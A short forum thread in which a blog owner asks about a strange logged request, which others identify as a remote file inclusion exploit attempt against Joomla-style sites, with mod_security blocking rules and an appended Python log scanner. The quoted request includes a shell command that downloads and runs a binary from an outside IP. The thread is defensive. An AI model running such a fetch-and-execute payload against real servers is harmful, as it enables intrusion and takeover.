Does anyone know what this is? (5 posts)

  1. CharlesKrause
    Member
    Posted 8 years ago #

    I got a really odd hit on my blog, according to the counterize stats page. I got a request for this URL

    /index.php?option=com_content& do_pdf=1&id=1index2.php?_REQUE ST[option]=com_content&_REQUES T[Itemid]=1&GLOBALS=&mosConfig _absolute_path=http://72.18.19 5.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo|

    Anyone have any clue what this is? Is it an attempt to burrow through a security hole or something - should I be concerned?

  2. whooami
    Member
    Posted 8 years ago #

    script kiddies... it's an attempted exploit, yes. I wouldn't worry too much though, and if you have mod_security available you can block it and any similar requests completely.

  3. JMusic
    Member
    Posted 8 years ago #

    How would you block something like that with mod_security?

  4. whooami
    Member
    Posted 8 years ago #

    mod_security addresses that very attack with this:

    #remote file inclusion generic attack signature
    SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
    SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
    SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?&(cmd|command|inc|name)="
    SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
    SecFilter "\?&(cmd|inc|name)="
    SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?&(cmd|inc|name)="
    SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp):/.*\?&cmd="

    that's one of the already put-together rules from gotroot
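
How the rules in post 4 evaluate a request shaped like the one in the first post, as an added Python example that is not part of the thread and is not gotroot's or mod_security's code. It assumes the literal `.` and `?` in the patterns are backslash-escaped, matches the URL-decoded URI case-insensitively, models `chain` as "every pattern must match", and leaves out the ARGS variants, which reuse the same patterns; the log lines, addresses and rule names are constructed.

```python
import re
from urllib.parse import unquote

EXT = r"\.(dat|gif|jpg|png|bmp|txt|vir|dot)"
# Rule name (hypothetical label) -> patterns that must ALL match, as with "chain".
RULES = {
    "rfi-chain-request": (
        EXT + r"\?",
        r"((name|pm_path|pagina|path|include_location|root|page|open)"
        r"=(http|https|ftp)|(cmd|command|inc)=)",
    ),
    "rfi-ext-cmd": (EXT + r"\?&(cmd|command|inc|name)=",),
    "rfi-php-remote-url": (r"\.php\?.*=(http|https|ftp):/.*\?&cmd=",),
}
COMPILED = {n: [re.compile(p, re.I) for p in pats] for n, pats in RULES.items()}

# Request line inside a combined-format access log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def matching_rules(request_uri):
    """Return sorted names of rules whose patterns all match the decoded URI."""
    decoded = unquote(request_uri)  # so %3F / %26 encoding does not hide ?&cmd=
    return sorted(n for n, pats in COMPILED.items()
                  if all(p.search(decoded) for p in pats))

def scan(lines):
    """Yield (line_number, uri, rule_names) for each log line that trips a rule."""
    for number, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            hits = matching_rules(m.group("uri"))
            if hits:
                yield number, m.group("uri"), hits

# Constructed sample log; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2007:10:00:05 +0000] "GET /index.php?option=com_content'
    '&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=PLACEHOLDER HTTP/1.1" 404 312',
    # First half of the chain matches (.gif?), second half does not: no alert.
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /wp-content/uploads/photo.gif?ver=2 HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for number, uri, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)} <- {uri}")
```
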

  5. whooami
    Member
    Posted 8 years ago #

This topic has been closed to new replies.